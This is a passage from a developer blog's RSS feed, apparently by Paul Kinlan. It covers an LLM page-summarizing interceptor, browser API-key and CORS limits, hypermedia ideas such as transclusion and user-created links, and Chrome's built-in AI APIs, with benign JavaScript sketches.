</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">result</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">generateText</span>({
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">model</span><span style="color:#f92672">:</span> <span style="color:#a6e22e">groq</span>(<span style="color:#e6db74">&#34;openai/gpt-oss-120b&#34;</span>),
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">system</span><span style="color:#f92672">:</span> <span style="color:#e6db74">`You are a world class expert in summarizing web pages. You take the content of a web page and distill it down to the most important points. You return HTML only.`</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">prompt</span><span style="color:#f92672">:</span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">response</span>.<span style="color:#a6e22e">text</span>(),
</span></span><span style="display:flex;"><span>    });
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> {
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">headers</span><span style="color:#f92672">:</span> <span style="color:#a6e22e">headers</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">status</span><span style="color:#f92672">:</span> <span style="color:#a6e22e">status</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">body</span><span style="color:#f92672">:</span> <span style="color:#a6e22e">result</span>.<span style="color:#a6e22e">text</span>,
</span></span><span style="display:flex;"><span>    };
</span></span><span style="display:flex;"><span>  };
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">constructor</span>(<span style="color:#a6e22e">test</span>) {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">this</span>.<span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;SummaryInterceptor&#34;</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">this</span>.<span style="color:#960050;background-color:#1e0010">#</span><span style="color:#a6e22e">test</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">test</span>;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">get</span> <span style="color:#a6e22e">test</span>() {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">this</span>.<span style="color:#960050;background-color:#1e0010">#</span><span style="color:#a6e22e">test</span>;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">get</span> <span style="color:#a6e22e">requestHandler</span>() {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">this</span>.<span style="color:#960050;background-color:#1e0010">#</span><span style="color:#a6e22e">requestHandler</span>;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">get</span> <span style="color:#a6e22e">responseHandler</span>() {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">this</span>.<span style="color:#960050;background-color:#1e0010">#</span><span style="color:#a6e22e">responseHandler</span>;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">export</span> { <span style="color:#a6e22e">SummaryInterceptor</span> };
</span></span></code></pre></div><p>And you know what? It only flippin&rsquo; works! (Note: I use Groq for this demo because it has an incredibly fast response time. You can use any LLM you like).</p>
<figure><img src="/images/summary.png"
    alt="Interceptium intercepting a request and summarizing the web page">
</figure>

<p>Why is this interesting? Well, it opens up a whole new world of possibilities. You could have interceptors that craft pages to your needs and preferences without the author having to do anything. Some ideas for interceptors that spring to mind are:</p>
<ul>
<li>One that adds links to related content based on my reading history or one that translates content into my preferred language.</li>
<li>One that can augment the structure of the page to make it more navigable or accessible.</li>
<li>One that highlights key information based on my interests—I could imagine indicating that I want to highlight key information about whether a hotel is kid-friendly or has good Wi-Fi.</li>
<li>One that finds unstructured data within a page (e.g., a paragraph describing a product&rsquo;s specs) and automatically reformats it into a clean, sortable HTML table. For example, it could turn a camera review into a spec sheet comparing it to other models you&rsquo;ve recently viewed.</li>
<li>One that identifies section breaks and headings to automatically generate and inject a floating &ldquo;Table of Contents&rdquo; for easy navigation.</li>
<li>One that adjusts a recipe page and adds controls to instantly adjust ingredient quantities for a different number of servings. Based on your preferences, it could also automatically convert all measurements to metric and suggest substitutions for dietary restrictions.</li>
</ul>
<p>There are also a lot of risks and challenges with this approach. The security implications are significant, and a lot of thought would need to go into protecting users from malicious interceptors that change the functionality or content of a page to be misleading or harmful, or that insert prompt injections to exfiltrate sensitive information. Not to mention the significant performance costs and energy requirements of large language models.</p>
<p>That being said, I do think that we should be discussing this type of functionality as a potential future direction for browsers because the ability to customize and adapt the web to our needs is incredibly powerful.</p>
]]></content:encoded></item><item><title>dangerous</title><link>https://aifoc.us/dangerous/</link><pubDate>Fri, 22 Aug 2025 00:00:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/dangerous/</guid><description>&lt;p>The thing about the web is that you don&amp;rsquo;t know what is on the other end of a link. And yet, we happily click and tab on these blue, underlined pieces of text that could then run practically anything within the confines of that little tabbed rectangle. It&amp;rsquo;s an incredible thing to be able to deliver and run code that is unknown and unseen by the user. Imagine a world where instead of links, you had to visit a store, look at reviews and screenshots, and then install some software before it could be run. Pffft. What are we? Mobile platforms?&lt;/p></description><content:encoded><![CDATA[<p>The thing about the web is that you don&rsquo;t know what is on the other end of a link. And yet, we happily click and tab on these blue, underlined pieces of text that could then run practically anything within the confines of that little tabbed rectangle. It&rsquo;s an incredible thing to be able to deliver and run code that is unknown and unseen by the user. Imagine a world where instead of links, you had to visit a store, look at reviews and screenshots, and then install some software before it could be run. Pffft. What are we? Mobile platforms?</p>
<p>We web users love to live dangerously. Decades of work by browser engines have made the reality of clicking a link and blindly running code by and large safe&hellip; well, safer. When we were coining the <a href="https://paul.kinlan.me/slice-the-web/">SLICE</a> acronym, the &lsquo;S&rsquo; was for security. So much of what we know as the web today is pulled from other origins. Scripts, stylesheets, fonts, images, videos, audio, and entire pages (via iframes) are all able to run in some form on another origin. The <a href="https://en.wikipedia.org/wiki/Same-origin_policy">same-origin</a> model was developed along with Netscape 2.0 to give users confidence that one site couldn&rsquo;t exfiltrate data from another. Process isolation was built to reduce the chance of actions in one tab or site affecting another, and sandboxing lets us run arbitrary code without worrying that it can have access to anything on our systems.</p>
<p>The modern web and the fact that it can do so much is a testament to the browser engineers that have worked for decades on improving the safety of the platform. At the same time, this model puts a real limit on the types of things that we want to do. Try building a client-side RSS reader or a podcast app. The limitation on reading from another origin means that we can&rsquo;t fetch an RSS feed because who would put an <code>Access-Control-Allow-Origin: *</code> header on an XML file, let alone an MP3?</p>
<p>Large language model service providers are my current area of focus and they have an escape hatch with solutions like <code>anthropic-dangerous-direct-browser-access</code> (I&rsquo;m happy to have filed the first issue asking for <a href="https://github.com/anthropics/anthropic-sdk-typescript/issues/219">CORS for Anthropic</a>) and <code>dangerouslyAllowBrowser</code>, which let me drop API keys into web pages. This is the solution we have, not the one we need.</p>
<p>We should be able to access services directly from one origin to another without having to proxy everything. The minute I have to make a proxy, I also have to secure it and deal with many of the same problems as having my keys on the client.</p>
<p>OpenAI has had to deal with this head-on with their rather spectacular Real-time Audio API, which is accessible directly in the client because it opens up a WebRTC connection to their services. After all, you can&rsquo;t be expected to proxy the audio through a server.</p>
<blockquote>
<p>Connecting to the Realtime API from the browser should be done with an ephemeral API key.
— <a href="https://platform.openai.com/docs/guides/realtime#:~:text=Connecting%20to%20the%20Realtime%20API%20from%20the%20browser%20should%20be%20done%20with%20an%20ephemeral%20API%20key">OpenAI WebRTC Documentation</a></p></blockquote>
<p>Ephemeral API keys! It&rsquo;s kind of like <a href="https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/CSRF">CSRF</a> protection built into the API. It works well for what it is, providing time-bound access for a single user without completely exposing my API key. The key can still be stolen, but it&rsquo;s only valid for a relatively short amount of time.</p>
<p>It really feels like we need a scalable platform solution for accessing protected resources on the client, not just LLM APIs. I can&rsquo;t see a world where it&rsquo;s not opt-in from the server, which means we probably won&rsquo;t see a world where we can access and process common resources like RSS feeds and the like. But the need and opportunity seem clear.</p>
<p>I always liked the idea of <a href="https://www.w3.org/TR/webcrypto/#:~:text=The%20handle%20represents,underlying%20cryptographic%20implementation">Opaque JavaScript Objects</a>.</p>
<blockquote>
<p>This specification does not explicitly provide any new storage mechanisms for <code>CryptoKey</code> objects. Instead, by defining serialization and deserialization steps for <code>CryptoKey</code> objects, any existing or future web storage mechanisms that support storing serializable objects can be used to store <code>CryptoKey</code> objects. In practice, it is expected that most authors will make use of the Indexed Database API, which allows associative storage of key/value pairs, where the key is some string identifier meaningful to the application, and the value is a <code>CryptoKey</code> object. This allows the storage and retrieval of key material, without ever exposing that key material to the application or the JavaScript environment. Additionally, this allows authors the full flexibility to store any additional metadata with the <code>CryptoKey</code> itself.
— <a href="https://www.w3.org/TR/webcrypto/#:~:text=This%20specification%20does%20not%20explicitly,used%20to%20store%20CryptoKey%20objects">CryptoKey</a></p></blockquote>
<p>With <code>CryptoKey</code>, user-land JS doesn&rsquo;t have access to the key, but the APIs do. Neat.</p>
<p>Everyone I&rsquo;ve spoken to about this has not wanted to explore it because &ldquo;if the key is on the device, it&rsquo;s compromised,&rdquo; and at some point, it will be visible (e.g., in a network trace). I understand the concern, but then we have situations like we do today where people are putting their API keys in the browser or using temporary tokens. So to me, at least, it feels like an Opaque Object system would help a lot.</p>
<p>I do wonder if there is a concept of a <code>Subscription</code> or <code>Session</code> at the platform level that could be used for providing information about who the user is and what they have access to. If things are all running on the client, it&rsquo;s unlikely there&rsquo;s any &lsquo;secret sauce&rsquo; at the application level. But it would be nice to then apply the <code>Subscription</code> to something like a <code>LanguageModel</code> in Chrome that just uses the user&rsquo;s subscription to 1) use my preferred service, and 2) use my identity.</p>
<p>Maybe the answer is just OAuth: a way to mint API keys for the user and then manage key lifetimes with something like <a href="https://oauth.net/2/dpop/">Demonstrating Proof of Possession (DPoP)</a>. I would be very happy if I never had to deal with OAuth again, though.</p>
<p>Regardless of the solution, I would love to see more progress towards letting more work run on the client without the need for proxies. I would love to see a better solution for non-protected resources so that RSS readers can be a viable client-side experience, and I would love to call protected resources such as an LLM without exposing my service keys or leaking API keys.</p>
]]></content:encoded></item><item><title>hypermedia</title><link>https://aifoc.us/hypermedia/</link><pubDate>Mon, 18 Aug 2025 00:00:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/hypermedia/</guid><description>&lt;p>I was introduced to the concept of the &lt;a href="https://en.wikipedia.org/wiki/Memex">Memex&lt;/a> after my post about &lt;a href="https://aifoc.us/super-apps/">super-apps&lt;/a>. It&amp;rsquo;s a fascinating view of the future from the late 1940s and early 1950s. &lt;a href="https://en.wikipedia.org/wiki/Vannevar_Bush">Vannevar Bush&lt;/a> presented a vision of an information system that he named the Memex. Ignoring the heavily gendered language and technology that were firmly set in their time (microfilm), &lt;a href="https://www.ias.ac.in/article/fulltext/reso/005/11/0094-0103">&amp;ldquo;As We May Think,&amp;rdquo; the article that introduced the Memex, was a fabulous read that I encourage everyone to explore&lt;/a>.&lt;/p></description><content:encoded><![CDATA[<p>I was introduced to the concept of the <a href="https://en.wikipedia.org/wiki/Memex">Memex</a> after my post about <a href="/super-apps/">super-apps</a>. It&rsquo;s a fascinating view of the future from the late 1940s and early 1950s. <a href="https://en.wikipedia.org/wiki/Vannevar_Bush">Vannevar Bush</a> presented a vision of an information system that he named the Memex. Ignoring the heavily gendered language and technology that were firmly set in their time (microfilm), <a href="https://www.ias.ac.in/article/fulltext/reso/005/11/0094-0103">&ldquo;As We May Think,&rdquo; the article that introduced the Memex, was a fabulous read that I encourage everyone to explore</a>.</p>
<p>I&rsquo;ve been thinking about the nature of hyperlinking for a little while now, and the concept of the Memex pushed me to immerse myself in as much pre-web research about <a href="https://archive.org/details/SelectedPapers1977">hypertext</a> and <a href="https://dl.acm.org/doi/10.1145/800197.806036">hypermedia</a> as I could find, and to learn how people originally thought about it. It was a fun exploration. From spats between researchers to <a href="https://www.w3.org/Xanadu.html">platforms that never shipped</a>, and the incredible firsts shown by pioneers like Douglas Engelbart in &ldquo;<a href="https://en.wikipedia.org/wiki/The_Mother_of_All_Demos">The Mother of All Demos</a>&rdquo;, you can clearly see the path that led to the web becoming the first truly popular and universal hypermedia platform.</p>
<p>I also realized that even though I have been working with HTML for 30 years, I didn&rsquo;t have a clear concept of what the &lsquo;HT&rsquo; truly meant or how the early pioneers envisioned information systems—and how their vision differs from the web we have today.</p>
<p>The early years of hypertext research focused on the opportunities that digital text offered over the print medium. The concept of linking was firmly established in the earliest ideas of hypertext. Vannevar Bush, with his Memex, imagined a system where the <em>user</em>, not the author, would create personal connections between documents. As an individual navigated information, they would forge what Bush called &ldquo;trails&rdquo;: links that were deeply personal and catered to their own memory and thought processes. Other pioneers like Ted Nelson conceptualized even more expansive ideas, such as <em>StretchText</em>, where text could be expanded to reveal layers of additional information, hinting at a far more interactive system than what we have today.</p>
<p><em>A user would create the links.</em></p>
<p>When the web was introduced, it had the concept of hyperlinks, but it wasn&rsquo;t until this past month that I realized its model is fundamentally different. Links are created by the <strong>author</strong> of a page using the static <code>&lt;a&gt;</code> tag. We, the readers, simply follow these pre-defined paths.</p>
<p>This author-centric model has a frustrating side effect that I feel every day: sites acting like <strong>&ldquo;gravity wells.&rdquo;</strong> An author can guide me to knowledge, but as sites try to capture as much of our time and attention as possible, they reduce the number of external links. I land on a page and find myself trapped, with fewer and fewer paths leading out. Every link is defined by the publisher, not my own curiosity.</p>
<p>How do you make a connection between two articles for your own recall? At best, we have bookmarks.</p>
<p>I can understand why the concept of user-created links didn&rsquo;t develop. Managing URLs is complex, finding URLs was nearly impossible at the start of the web, and the &ldquo;chrome&rdquo; of the browser, with its history and bookmarks, isn&rsquo;t incredibly well understood by most. Not to mention, how would you inject links into a page you don&rsquo;t own and can&rsquo;t write to?</p>
<p>Well, I built an extension that allows you to create and persist user-defined links between any two pieces of content on the web. It turns out that one of the latest changes in how we think about links, the concept behind <a href="https://developer.mozilla.org/en-US/docs/Web/URI/Reference/Fragment/Text_fragments">Text Fragments</a>, is very helpful for identifying pieces of content on a page and giving them a permanent identifier.</p>
<div class="youtube">
      <iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen" loading="eager" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/BD_CWhJzGfQ?autoplay=0&amp;controls=1&amp;end=0&amp;loop=0&amp;mute=0&amp;start=0" title="YouTube video"></iframe>
    </div>
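<p>To make the idea concrete, here is a minimal sketch of how a user-created link could be stored as a pair of Text Fragment URLs. It is not the extension&rsquo;s actual code: the function names and the <code>{ from, to }</code> record shape are assumptions for illustration, and the example URLs are placeholders.</p>

```javascript
// Sketch only: the record shape and function names are assumptions.

// Percent-encode text for a text directive. "-", "," and "&" are syntax
// characters inside a directive, so they must be escaped. encodeURIComponent
// already handles "," and "&" but leaves "-" untouched, hence the replace.
const encodeDirectiveText = (text) =>
  encodeURIComponent(text).replace(/-/g, "%2D");

// Build a URL that points at a passage of text on a page.
function textFragmentUrl(pageUrl, text) {
  const url = new URL(pageUrl);
  url.hash = ""; // drop any existing fragment
  return `${url.href}#:~:text=${encodeDirectiveText(text)}`;
}

// A user-created link is then just a pair of fragment URLs.
function createUserLink(from, to) {
  return {
    from: textFragmentUrl(from.url, from.text),
    to: textFragmentUrl(to.url, to.text),
  };
}

const link = createUserLink(
  { url: "https://example.com/a", text: "user-created links" },
  { url: "https://example.org/b#top", text: "trails" },
);
console.log(link.from);
console.log(link.to);
```

<p>Because both ends are plain URLs, a record like this could be persisted anywhere an extension can store strings.</p>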

<p>So far, this discussion hasn&rsquo;t focused much on AI&rsquo;s impact on the web&hellip; Large Language Models offer two distinct ways to think about the future of hypermedia: one as a philosophical successor to the original vision (which is a much longer discussion), and the other as the practical toolkit to upgrade the web we already have (which is quite fun).</p>
<p>As I was thinking about the Memex, I kept circling back to the idea that LLMs, not the web, are its modern embodiment. My usage of Large Language Models doesn&rsquo;t feel a million miles away from what Bush described. His vision was deeply personal: you build and navigate your own web of knowledge. While LLMs are grounded in their training data, your previous conversations and connections to personal data make the experience something more than what we get on the web. I tried to summarize the analogy as follows:</p>
<ul>
<li>The LLM is the information retrieval system.</li>
<li>ChatGPT/Gemini are the personal machines, with context and memory tailored to you.</li>
<li>The web is the unstructured, non-hierarchical file system.</li>
<li>Wikipedia is the encyclopedia (obviously).</li>
<li>Memory in LLM apps represents the trails that don&rsquo;t fade.</li>
<li>Multimodality corresponds to the photocells, microfiche, and tape.</li>
<li>Reasoning is analogous to the identification of compounds and their reactions.</li>
</ul>
<p>In this view, the concept of &ldquo;trails&rdquo; is deeply interesting. LLM tools don&rsquo;t create hard, permanent links between two distinct pieces of information. Instead, they build on previous interactions as a conversation progresses. If you observe their &ldquo;thinking traces,&rdquo; you can see the link being <em>inferred</em> rather than explicitly created.</p>
<p>Beyond this philosophical parallel, LLMs also offer the practical <em>tools</em> to finally realize the promise of hypertext <em>on the web itself</em>. They are the enabling technology that can upgrade the humble <code>&lt;a&gt;</code> tag and make it truly &ldquo;hyper.&rdquo;</p>
<p>For decades, ideas like summarizing a link&rsquo;s destination or merging content from another page were technically possible but practically impossible to implement at scale. With LLMs, these complex natural language tasks become trivial. This opens the door to evolving the web and differentiating it from both applications and the closed conversational interfaces of LLMs. And it all comes down to enhancing the link.</p>
<p>While the humble <code>&lt;a&gt;</code> tag is part of the concept of hypertext, I don&rsquo;t think the <code>&lt;a&gt;</code> is actually &ldquo;hyper.&rdquo; It&rsquo;s just a pointer. It points from Site A to Site B. It might have some <code>rel</code> properties to define the nature of the link, but fundamentally, it&rsquo;s just a pointer.</p>
<p>Now, I&rsquo;m being a bit harsh on the <code>&lt;a&gt;</code> tag. It&rsquo;s actually pretty incredible. Links are very simple to create. You write a small bit of text and can point to a page, a named element within a page, and in probably the biggest change to anchoring—you can now link to arbitrary text with Text Fragments. For a brief while, <a href="https://paul.kinlan.me/what-happened-to-web-intents/">you could also link into functionality</a> (actually if websites could be MCP servers, we might actually solve this).</p>
<p>The way we experience a link is typically one-way: <code>A-&gt;B</code>. Yes, many platforms like <a href="https://www.wikimedia.org/">Wikipedia</a> or <a href="https://tiddlywiki.com/">TiddlyWiki</a> allow for bi-directional linking. And yes, there are protocols like WebMention that enable ping-backs so that a site owner can present all the sites that link to them. But site-level features like these require the site to support them, and infrastructure protocols require you to set up some very complex infrastructure.</p>
<p>This got me thinking: how might links on the web become two-way? Actually, how many &ldquo;ways&rdquo; could a link be?</p>
<p>Let&rsquo;s assume we have a simple link <code>&lt;a href=&quot;https://paul.kinlan.me/slice-the-web/&quot;&gt;Slice the web&lt;/a&gt;</code> and ignore how links work today in HTML and JavaScript (i.e., referrer).</p>
<ol>
<li><strong>Site A points to Site B (<code>A -&gt; B</code>).</strong> This is the traditional link we know today.</li>
<li><strong>Site A pulls from Site B (<code>A &lt;- B</code>).</strong> What if we could pull information from the link&rsquo;s target into the current page&rsquo;s context? Could we summarize the information to give you an idea of the content before navigating? Could we merge the target page and the current page?</li>
<li><strong>Site B understands what points to it (<code>B -&gt; A</code>).</strong> As a user, I might want to know where I came from more clearly (yes, we have a back button), or I might want to know which other sites link to this page. WebMention solves some of this, but could this functionality be part of the browser itself, even with complex infrastructure?</li>
<li><strong>Site B pulls from Site A (<code>B &lt;- A</code>).</strong> This is more complex, but as with <code>A &lt;- B</code>, being able to merge content from the referring site directly into the current page offers interesting possibilities.</li>
</ol>
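<p>The two &ldquo;pointer&rdquo; directions in that list (<code>A -&gt; B</code> and <code>B -&gt; A</code>) can be sketched as a small index that records every link twice, once per direction. This is a hypothetical in-memory structure, not a browser or WebMention API, and the example origins are made up; the two &ldquo;pull&rdquo; directions would additionally need the content of the other page.</p>

```javascript
// Hypothetical in-memory index; class and method names are assumptions.
function addToSet(map, key, value) {
  if (!map.has(key)) map.set(key, new Set());
  map.get(key).add(value);
}

class LinkIndex {
  #outgoing = new Map(); // source URL -> Set of target URLs
  #incoming = new Map(); // target URL -> Set of source URLs

  // Record a link in both directions.
  add(from, to) {
    addToSet(this.#outgoing, from, to);
    addToSet(this.#incoming, to, from);
  }

  // A -> B: where does this page point?
  linksFrom(url) {
    return [...(this.#outgoing.get(url) ?? [])];
  }

  // B -> A: which pages point here?
  linksTo(url) {
    return [...(this.#incoming.get(url) ?? [])];
  }
}

const index = new LinkIndex();
index.add("https://a.example/post", "https://paul.kinlan.me/slice-the-web/");
index.add("https://c.example/notes", "https://paul.kinlan.me/slice-the-web/");
console.log(index.linksTo("https://paul.kinlan.me/slice-the-web/"));
```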
<p>I&rsquo;m particularly enamored by the &ldquo;A pulls from B&rdquo; (<code>A &lt;- B</code>) concept, frequently known as &ldquo;<a href="https://en.wikipedia.org/wiki/Transclusion">transclusion</a>&rdquo;, and I can understand why it wasn&rsquo;t built in the past. How could you do anything useful with the content on the target page? Until recently, NLP techniques were incredibly difficult to perform, but with the introduction of LLMs, summarizing and other manipulation of content has become surprisingly easy.</p>
<p>I wrote an extension that can help you to summarize a link&rsquo;s destination before you navigate to it.</p>
<div class="youtube">
      <iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen" loading="eager" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/p0za2eedC9M?autoplay=0&amp;controls=1&amp;end=0&amp;loop=0&amp;mute=0&amp;start=0" title="YouTube video"></iframe>
    </div>

<p>I&rsquo;ll quickly digress to another hypermedia concept introduced by Ted Nelson: <a href="https://archive.org/details/STRETCHTEXT">StretchText</a>. I think the concept is brilliant. You have a piece of text that can be expanded to provide significantly more information, and then expanded again. It&rsquo;s incredibly difficult to manage from an author&rsquo;s perspective because you have to create all this layered information. How much time would you spend doing this? Probably zero.</p>
<p>With today&rsquo;s LLM technologies, we can reason more about the content of pages, which gives us the ability to take the text of a page or a selection and expand it with additional context from what the models know.</p>
<p>You can then take this concept and change the way linking works. By parsing both the linked page and the current page, it&rsquo;s possible to merge the linked content into the current context where the link exists. Perhaps we could remove the scourge of &ldquo;Click here&rdquo; links and provide more context to the user for any link on the page.</p>
<div class="youtube">
      <iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen" loading="eager" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/M0o4MNmWIDo?autoplay=0&amp;controls=1&amp;end=0&amp;loop=0&amp;mute=0&amp;start=0" title="YouTube video"></iframe>
    </div>

<p>In <a href="/super-apps/">super-apps</a> and <a href="/embedding/">embedding</a> I touched on the idea that increasing amounts of people&rsquo;s time might be spent in LLM based chat experiences and not in the browser. If this happens, there is a world where the way people interact with services and tools is managed entirely by the LLM and that is a risk for the web.</p>
<p>Imagine you are a store that provides a service to help a user find flights. One of the ways that you make money is by up-selling services on top of the booking (e.g., gate change information). In a world where the LLM is the primary way that people interact with content, you will want to ensure that your brand and service are still visible to the user. LLMs will either generate the entire UI themselves to integrate with services and existing sites, or they will ask site authors to customize their site (including bespoke API integrations). If it&rsquo;s the latter path, LLM providers will want to use what already exists (i.e., hundreds of millions of existing pages of content), which leads me to believe that there will be a need for sites to easily control the presentation of their brand and service inside the &ldquo;super-app&rdquo;.</p>
<p>&ldquo;Transclusions&rdquo; is the technical term. Today, <code>&lt;iframe&gt;</code> is the transclusion that enables you to have an entire page run inside another page, but that feels too coarse. We need to explore the idea of securely running islands of functionality from the target page directly in the host.</p>
<p>I mocked this up in the following video. This demo is a Chrome Extension that opens the target page, finds the element that is specified on the link and clones the DOM into a <code>&lt;foreignObject&gt;</code> in SVG which is then bundled up and rendered in the host page (/me handwaves security issues).</p>
<div class="youtube">
      <iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen" loading="eager" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/WU-VVTkwDoU?autoplay=0&amp;controls=1&amp;end=0&amp;loop=0&amp;mute=0&amp;start=0" title="YouTube video"></iframe>
    </div>

<p>Make no mistake, this particular demo is a parlour trick, but I think there might be a useful primitive here, not just for integrating web content more seamlessly into an LLM, but also as something that native-app platforms could offer to enable a more seamless integration between web and app content. The solution might be a new element, adding something on top of an iframe, or maybe even a media-query to enable the site to hide certain UI when it knows it&rsquo;s embedded.</p>
<p>It&rsquo;s fun to think about how links might evolve as our technology evolves. Here are some more ideas:</p>
<ul>
<li>Image maps have largely died out, but now that we can identify objects in an image, could we make it easier to author an image map with language annotations instead of bounding boxes (e.g., &ldquo;red car&rdquo; -&gt; ford.com)?</li>
<li>We can link to a time-code in an audio file. With audio-to-text models, could we do something similar to text fragments for audio?</li>
<li>Could we make it easier to extract useful content from an <code>&lt;audio&gt;</code>, such as links that were &lsquo;heard&rsquo; in the discussion?</li>
<li>If a site could expose their embeddings, could we cross-link across the origin automatically?</li>
<li>During my research on hyperlinking, much of the content I accessed was in PDFs on the Internet Archive. These PDFs are hosted in an application that requires many clicks to get to the important page. Could links be augmented with simple actions? Of course, we would have to think carefully about safety to mitigate &ldquo;Buy these nappies&rdquo; attacks and a host of others.</li>
</ul>
<p>For 30-40 years the original discussions around hypermedia and hypertext had almost no practical applications. It appears to have been all academic and centered around egos. While technologies like HyperCard existed and were well-liked, it wasn&rsquo;t until the web arrived that humanity really progressed in this area. In the following 30 years, there again wasn&rsquo;t much development in linking on the web.</p>
<p>We are at a moment where new technologies like LLMs and Vision models can enable us to expand and improve the very definition of a hyperlink while also maintaining the reason why I think the web&rsquo;s linking mechanism enabled the web to succeed where other hypermedia platforms failed: that authoring an <code>&lt;a&gt;</code> is the easiest way of linking that we&rsquo;ve known.</p>
<p>Maybe the fact that we have extensions that can augment and personalize every part of a page means we are already there. Maybe this post is also academic and ego-driven, and hypermedia has already found its perfect fit for authors and users. I hope not. The link is what makes the web, and the link is what will keep the web strong and differentiated from all other platforms. I really want to see more experimentation in hyperlinking.</p>
]]></content:encoded></item><item><title>elements</title><link>https://aifoc.us/elements/</link><pubDate>Wed, 16 Jul 2025 17:00:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/elements/</guid><description>&lt;p>As much as I struggle with &lt;a href="https://aifoc.us/on-device/">on-device processing&lt;/a> and the quality of its output compared to server models, I am excited by some of the APIs that are being built into browsers that are backed by LLMs and other AI inference models.&lt;/p>
&lt;p>For example, the prompt API, along with a multi-modal version that can take any arbitrary combination of text, image, and audio and run prompts against them. These APIs are neat but not yet web-exposed and many developers struggle to know what to do with a generic prompt. It&amp;rsquo;s not a solution that is natural to many people yet.&lt;/p></description><content:encoded><![CDATA[<p>As much as I struggle with <a href="/on-device/">on-device processing</a> and the quality of its output compared to server models, I am excited by some of the APIs that are being built into browsers that are backed by LLMs and other AI inference models.</p>
<p>For example, the prompt API, along with a multi-modal version that can take any arbitrary combination of text, image, and audio and run prompts against them. These APIs are neat but not yet web-exposed and many developers struggle to know what to do with a generic prompt. It&rsquo;s not a solution that is natural to many people yet.</p>
<p>To solve this, Chrome introduced a host of use-case-based APIs into the browser. These APIs, such as <a href="https://developer.chrome.com/docs/ai/summarizer-api">Summarizer</a>, <a href="https://developer.chrome.com/docs/ai/writer-api">Writer</a>, <a href="https://developer.chrome.com/docs/ai/rewriter-api">Rewriter</a>, <a href="https://developer.chrome.com/docs/ai/translator-api">Translate</a>, and <a href="https://developer.chrome.com/docs/ai/language-detection">Language Detection</a>, are designed to run within web content. An API designed to solve a particular problem is easier to standardize and build consensus around. It also makes it clearer for web developers and business owners to see how they might integrate it into their businesses.</p>
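<p>As a rough illustration of how little code a task-specific API needs, here is a sketch of calling the Summarizer API with feature detection. The <code>api</code> parameter is an assumption I&rsquo;ve added so the function can be exercised outside the browser; in a page it falls back to the global <code>Summarizer</code>. Availability and option values may change as the API evolves, so treat this as a sketch rather than a reference.</p>

```javascript
// Sketch: summarize text with the built-in Summarizer API when it is present.
// `api` is an injected stand-in for the global `Summarizer` (an assumption
// for testability); returns null when summarization is not possible.
async function summarizeText(text, api = globalThis.Summarizer) {
  if (!api) return null; // API not exposed in this environment

  const availability = await api.availability();
  if (availability === "unavailable") return null;

  // create() may start a model download when the model is not yet on device.
  const summarizer = await api.create({
    type: "tldr",
    format: "plain-text",
    length: "short",
  });
  try {
    return await summarizer.summarize(text);
  } finally {
    summarizer.destroy(); // release the model session
  }
}

// In a supporting browser:
// summarizeText(document.body.innerText).then(console.log);
```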
<p>For example, while building this blog (it&rsquo;s Hugo-based), I would checkpoint my work by committing it to my Git repo. I realized that many products are subtly integrating AI into their experiences. For example, when you check something into your repo, a small star icon generates a commit message based on the changes. I use this all the time now because it beats my &ldquo;asdf&rdquo; messages hands-down.</p>
<figure><img src="/images/github-summarize.gif"
    alt="AI Summarize a set of github commits"><figcaption>
      <p>AI Summarize a set of github commits</p>
    </figcaption>
</figure>

<p>This is a use-case that I think is easy for people to understand.</p>
<p>While sharing a recent post, I saw a Tweet from my friend Eiji that was in Japanese, but I could still read it because a &ldquo;Translate&rdquo; link appeared within the text.</p>
<figure><img src="/images/translate-tweet.gif"
    alt="Translate Tweet"><figcaption>
      <p>Translate Tweet</p>
    </figcaption>
</figure>

<p>Again, another use-case that is easy to understand.</p>
